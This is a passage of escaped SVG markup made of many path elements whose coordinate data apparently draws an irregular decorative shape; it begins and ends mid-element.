-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n <path 